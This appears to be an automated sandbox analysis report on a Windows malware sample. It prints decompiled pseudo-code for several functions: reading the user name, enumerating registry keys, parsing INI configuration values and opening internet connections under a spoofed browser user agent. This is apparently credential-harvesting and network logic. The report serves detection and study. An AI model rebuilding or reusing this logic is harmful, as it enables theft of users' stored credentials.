GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00404F9F

Strings

, xrefs: 00404FD1

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 41c893dedcde754bc6b00b0ad1fa3d9c49c343d2c9f91b85bb6b7d5f9a6a7e2b
Instruction ID: 2fd615251f10e6357daf40c36cdb67df8a25334fb9d75881f247c1eb6ac5e9f4
Opcode Fuzzy Hash: 41c893dedcde754bc6b00b0ad1fa3d9c49c343d2c9f91b85bb6b7d5f9a6a7e2b
Instruction Fuzzy Hash: 8E51CB716402597ADB21DB65E849FEE7BB8EF41304F04406BFE44BB2D2D7788A84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004074DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004074DB(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E004159A4(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E00417114(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E004159A4(_t18,  &_v40);
						_t23 = E0041A545(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x004074e5
0x004074ec
0x004074ee
0x004074f6
0x00407500
0x00407506
0x00407507
0x0040750c
0x00407517
0x0040751d
0x00407523
0x00407526
0x0040752d
0x0040752e
0x00407545
0x0040754c
0x00407556
0x00407563
0x0040756f
0x00407571
0x00407571
0x0040754c
0x00407576
0x0040757d
0x00407582

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 004074EE
LocalFree.KERNEL32(?,.exe,00000000), ref: 00407576

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00407556
ExpandEnvironmentStringsW.KERNEL32(?,0040F01F,00000104), ref: 00407563

Strings

.exe, xrefs: 004074FD

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: 7e2a428bb6e2cc21f376435b3d0e521db17d762af8ba8b1e273611cbb8b174f9
Instruction ID: c524d25b66dfa68a5e9464f8b639f51a0aa30363f0ad966ac87bb6cf3026e4c4
Opcode Fuzzy Hash: 7e2a428bb6e2cc21f376435b3d0e521db17d762af8ba8b1e273611cbb8b174f9
Instruction Fuzzy Hash: BF11C671A40114BBDF10AB79ED09ECB3BADDF85364F100426B948F71A0D734DA44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417FF5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417FF5(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x42200c; // 0x42200c
					_t2 = _t18 + 0x422008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00417ff5
0x00417ff5
0x00417ffb
0x00417ffd
0x00417ffd
0x00418012
0x00418016
0x0041805a
0x00000000
0x0041805a
0x00418019
0x0041801b
0x0041801d
0x00418024
0x0041802b
0x00418031
0x00418034
0x00418048
0x00418051
0x00418054
0x00000000
0x00418054
0x0041805e

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0041800C
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 0041802B
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00418048
InternetCloseHandle.WININET(00000000), ref: 00418054

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00417FFD, 0041800B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 982633e50cd9bc0491ed2e29a6adb56035a89f89a96023ee7cafa2680c1db6cc
Instruction ID: c84b111c3f260741ce95b7a670c63cd2747d5d38314aa6e4c3d07eb6a1cd8523
Opcode Fuzzy Hash: 982633e50cd9bc0491ed2e29a6adb56035a89f89a96023ee7cafa2680c1db6cc
Instruction Fuzzy Hash: 7BF0F6722002007AD63257614D8CDAB7E6EEBCE761B05082DF646E1071CA358884C738

Uniqueness

Uniqueness Score: -1.00%

Function 00414616, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414616(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E004163F1(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E004159A4(0x83,  &_v216);
					_t141 =  &_v284;
					E004159A4(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E004164D4( &_v36,  &_v36, 0, 8);
					E004159A4(0x85,  &_v120);
					E004159A4(0x86,  &_v100);
					E004159A4(0x87,  &_v60);
					_t145 =  &_v80;
					E004159A4(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E0041A545(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E0041A545(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E0041A545(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E0041A66D(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E004145BC(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E004159A4(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t129);
											_push(_t121 + 0x1fe);
											_t51 = _t129 + 0x1fe; // 0x1fe
											_t124 = E00417114(_t145, 0x307, _t51, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E00416815(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00416421(_v24);
					if(_v32 <= _t134) {
						return E00416421(_v36);
					}
					return E0041252D(0x307, _v36, 0xcb);
				}
			}

0x00414616
0x00414627
0x0041462c
0x0041462e
0x00414630
0x00414635
0x0041488e
0x0041463b
0x00414646
0x0041464b
0x00414656
0x00414661
0x00414668
0x00414670
0x0041467d
0x0041468a
0x00414697
0x0041469c
0x004146a4
0x004146a9
0x004146af
0x004146b2
0x004146ba
0x004146d5
0x00000000
0x00000000
0x004146ee
0x004146f1
0x00414700
0x0041484b
0x0041484e
0x00000000
0x00000000
0x00000000
0x00000000
0x00414706
0x00414706
0x00414706
0x00414709
0x0041471b
0x00414720
0x00414723
0x00414728
0x00414745
0x0041474b
0x00414750
0x00414755
0x0041476a
0x0041476f
0x00414774
0x00000000
0x00000000
0x00000000
0x00000000
0x00414782
0x00414782
0x00414782
0x0041478d
0x00414795
0x004147a0
0x004147b5
0x004147a2
0x004147a6
0x004147ae
0x004147ae
0x004147b7
0x004147bd
0x004147c3
0x004147cd
0x004147d1
0x004147d7
0x004147d8
0x004147dd
0x004147e0
0x004147e1
0x004147e3
0x004147e9
0x004147f2
0x004147f8
0x004147fd
0x00414802
0x0041480e
0x00414818
0x0041481a
0x0041481a
0x00414818
0x00414802
0x004147cd
0x00000000
0x004147bd
0x00414755
0x0041481d
0x00414831
0x00414841
0x00414849
0x00000000
0x00414854
0x00414854
0x00414857
0x00414864
0x0041486c
0x00000000
0x00414885
0x00000000
0x0041487b

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004146CD
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004146F8
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041484E

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0041483B

Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 00414798

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 137cfddf440e73ae495e092153b88a1ed636d46c9a718eee097c781d9cde8df6
Instruction ID: 8dfede0f616527f459f3b1a45a83bfba924025500d4dc7406fb916bd56c8917b
Opcode Fuzzy Hash: 137cfddf440e73ae495e092153b88a1ed636d46c9a718eee097c781d9cde8df6
Instruction Fuzzy Hash: EC714A71D00119AFDB10EFE9CD45AEEB7BCEF88704F10406AAA15F3251D738AE858B65

Uniqueness

Uniqueness Score: -1.00%

Function 004136DC, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004136DC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v563;
				short _v576;
				short _v588;
				void* _v600;
				short _v608;
				WCHAR* _v612;
				intOrPtr _v615;
				WCHAR* _v616;
				intOrPtr _v619;
				WCHAR* _v620;
				WCHAR* _v623;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t81;
				WCHAR* _t83;
				void* _t84;
				WCHAR* _t87;
				WCHAR* _t88;
				short* _t93;
				WCHAR* _t94;
				int _t103;
				WCHAR* _t108;
				intOrPtr _t115;
				signed int _t116;
				void* _t118;

				_t118 = (_t116 & 0xfffffff8) - 0x26c;
				if(E0041BCB4( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L20:
					return 1;
				}
				_t121 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t108 = E004163F1(0x1fffe);
					_v612 = _t108;
					__eflags = _t108;
					if(_t108 == 0) {
						goto L20;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t108, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L19:
						E00416421(_t108);
						goto L20;
					}
					_t9 = _t51 + 1; // 0x1
					_t54 = E004172D1(_t108, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L19;
					}
					_t56 = E004163F1(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 == 0) {
						goto L19;
					} else {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t93 = _t11;
						_v624 = _t108;
						_v616 = _t93;
						_t57 = 0x5c;
						_t94 =  &(_t93[0xff]);
						__eflags = _t94;
						E004159A4(_t57,  &_v608);
						_t59 = 0x5d;
						E004159A4(_t59,  &_v588);
						_t61 = 0x5e;
						E004159A4(_t61,  &_v576);
						_t63 = 0x5f;
						E004159A4(_t63,  &_v600);
						goto L8;
						L17:
						_t69 = E0041730D(_v624, 1);
						_v628 = _t69;
						__eflags = _t69;
						if(_t69 != 0) {
							L8:
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t103 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t103 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_push( &_v524);
										_push(0xff);
										_push(_t94);
										_push(0);
										_t118 = _t118 + 1;
										_t81 = GetPrivateProfileStringW(_v623,  &_v600 & 0x00000034, ??, ??, ??, ??);
										__eflags = _t81;
										if(_t81 != 0) {
											_t83 = E004135CF(_v623, _t94);
											__eflags = _t83;
											if(_t83 > 0) {
												_t114 =  &_v563;
												_t84 = 0x55;
												E004159A4(_t84,  &_v563);
												_push(_t103);
												_push(_v619);
												_push(_t94);
												_push(_v615);
												_t37 =  &(_t94[0xff]); // 0x1fe
												_t104 = _t37;
												_t87 = E00417114( &_v563, 0x311, _t37, _t114);
												_t118 = _t118 + 0x14;
												__eflags = _t87;
												if(_t87 > 0) {
													_t115 = _a4;
													_t88 = E00416815(_t87, _t115, _t104);
													__eflags = _t88;
													if(_t88 != 0) {
														_t39 = _t115 + 4;
														 *_t39 =  &(( *(_t115 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							goto L17;
						} else {
							E00416421(_v620);
							_t108 = _v616;
							goto L19;
						}
					}
				} else {
					E00413682(_t121,  &_v524, _a4);
					goto L20;
				}
			}

0x004136e2
0x004136fd
0x004138bf
0x004138c7
0x004138c7
0x00413703
0x00413706
0x00413724
0x00413726
0x0041372a
0x0041372c
0x00000000
0x00000000
0x00413743
0x00413749
0x0041374b
0x004138b9
0x004138ba
0x00000000
0x004138ba
0x00413751
0x00413756
0x0041375b
0x0041375d
0x00000000
0x00000000
0x00413768
0x0041376d
0x00413771
0x00413773
0x00000000
0x00413779
0x00413779
0x00413779
0x00413781
0x00413785
0x0041378d
0x0041378e
0x0041378e
0x00413794
0x0041379f
0x004137a0
0x004137ab
0x004137ac
0x004137b7
0x004137b8
0x004137b8
0x00413895
0x0041389b
0x004138a0
0x004138a4
0x004138a6
0x004137bd
0x004137d7
0x004137dd
0x004137df
0x004137fb
0x004137fd
0x00413800
0x00413805
0x00413820
0x00413826
0x00413828
0x0041382e
0x0041382f
0x00413830
0x00413831
0x00413834
0x0041383c
0x00413842
0x00413844
0x0041384a
0x0041384f
0x00413851
0x00413855
0x00413859
0x0041385a
0x0041385f
0x00413860
0x00413866
0x00413867
0x00413871
0x00413871
0x00413877
0x0041387c
0x0041387f
0x00413881
0x00413883
0x00413889
0x0041388e
0x00413890
0x00413892
0x00413892
0x00413892
0x00413892
0x00413890
0x00413881
0x00413851
0x00413844
0x00413828
0x00413805
0x00000000
0x004138ac
0x004138b0
0x004138b5
0x00000000
0x004138b5
0x004138a6
0x00413708
0x00413710
0x00000000
0x00413710

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

GetPrivateProfileStringW.KERNEL32 ref: 00413743
GetPrivateProfileStringW.KERNEL32 ref: 004137D7
GetPrivateProfileIntW.KERNEL32 ref: 004137F5
GetPrivateProfileStringW.KERNEL32 ref: 00413820
GetPrivateProfileStringW.KERNEL32 ref: 0041383C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 3fa68b634ba682679769f0e5932c82a26f38bc34b3de735d1b29c67a8890a625
Instruction ID: b4d08900939bbce0642cbb8a32366c1cd8d218b0d58d2888e15fd907c27e94a2
Opcode Fuzzy Hash: 3fa68b634ba682679769f0e5932c82a26f38bc34b3de735d1b29c67a8890a625
Instruction Fuzzy Hash: B651E731504706EBE710AF51CC05BEB77E8EF84759F00082EFA44E71A1D738DA858B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C298, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041C298(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0041B75E(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0041B70E( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0041B70E( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0041B70E( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0041c298
0x0041c298
0x0041c298
0x0041c2a0
0x0041c2b5
0x0041c2b9
0x0041c2bf
0x0041c2c4
0x0041c2cb
0x0041c2d4
0x0041c2d7
0x0041c2dd
0x0041c304
0x0041c306
0x0041c30c
0x0041c2df
0x0041c2e1
0x0041c3a9
0x0041c3a9
0x0041c3ad
0x0041c3ad
0x0041c3ad
0x0041c3b6
0x0041c3ba
0x0041c2e7
0x0041c2f4
0x0041c2f7
0x0041c302
0x0041c316
0x0041c316
0x0041c319
0x00000000
0x00000000
0x0041c31f
0x0041c323
0x0041c383
0x0041c38c
0x0041c391
0x0041c393
0x00000000
0x0041c399
0x0041c39b
0x0041c3a1
0x0041c3a3
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c3a3
0x0041c325
0x0041c328
0x0041c334
0x0041c337
0x0041c33a
0x0041c33c
0x0041c33f
0x0041c342
0x0041c381
0x0041c381
0x0041c381
0x00000000
0x0041c344
0x0041c344
0x0041c34b
0x0041c34b
0x0041c350
0x00000000
0x0041c352
0x0041c358
0x0041c35d
0x0041c35f
0x00000000
0x0041c361
0x0041c36f
0x0041c372
0x0041c375
0x0041c37b
0x0041c37d
0x0041c314
0x0041c314
0x00000000
0x0041c37f
0x00000000
0x0041c37f
0x0041c37d
0x0041c35f
0x0041c346
0x0041c346
0x0041c349
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c349
0x0041c344
0x0041c342
0x00000000
0x0041c323
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c302
0x0041c2e1
0x0041c2dd
0x0041c3bf
0x0041c3c5

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,004050D3,?,?,?,00000102,?), ref: 0041C2B9

Part of subcall function 0041B75E: GetFileSizeEx.KERNEL32(00000000,00000000,?,?,?,0041C2D0,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041B76A

ReadFile.KERNEL32(?,?,00000005,?,00000000,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C2FA
CloseHandle.KERNEL32(?,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C306
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001,?,004050D3,?,?,?,00000102,?), ref: 0041C375
SetEndOfFile.KERNEL32(?,?,?,00000102,00000000,?,004050D3,?,?,?,00000102,?), ref: 0041C39B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 641f2e7e2a29685bd516cc833ff87fd08173eba113274ac5a158f56dcc9b6a08
Instruction ID: 3a27971000b381c6d623ff787edcd5426a78ac4eb5a83b3cb5d8e16854652d36
Opcode Fuzzy Hash: 641f2e7e2a29685bd516cc833ff87fd08173eba113274ac5a158f56dcc9b6a08
Instruction Fuzzy Hash: 0341D534940208AFDF208FA5CC85BEFBBB5EF88714F10861AF965E22A0D3394581CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041177E, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041177E(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E004163F1(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E00411735);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E004164D4( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E004163AC( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E0041645D( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E00416421(_v84);
						if(_v89 == 0) {
							E00416421( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E00419B8E( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E00416421(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0041177e
0x0041178c
0x00411797
0x0041179c
0x0041179e
0x004117a4
0x004117b3
0x004117c1
0x004117c5
0x004117c6
0x004117ce
0x004117d6
0x004117d8
0x004117dd
0x004117e6
0x004117ea
0x004117ee
0x004117ee
0x004117f1
0x004117f9
0x00411801
0x00411809
0x00000000
0x00000000
0x00411827
0x0041182f
0x00411839
0x00411859
0x00411859
0x0041183b
0x0041184a
0x00411853
0x00411855
0x00000000
0x00411855
0x00411839
0x0041185e
0x00411865
0x0041186f
0x00411875
0x0041187f
0x00411886
0x00411886
0x0041188b
0x00000000
0x0041188b
0x00411816
0x00000000
0x00411818
0x0041181c
0x00000000
0x0041181c
0x00000000
0x004117a6
0x004117a7
0x004117ac
0x004117ac
0x0041188f
0x00411894

APIs

ResetEvent.KERNEL32(?), ref: 0041178C
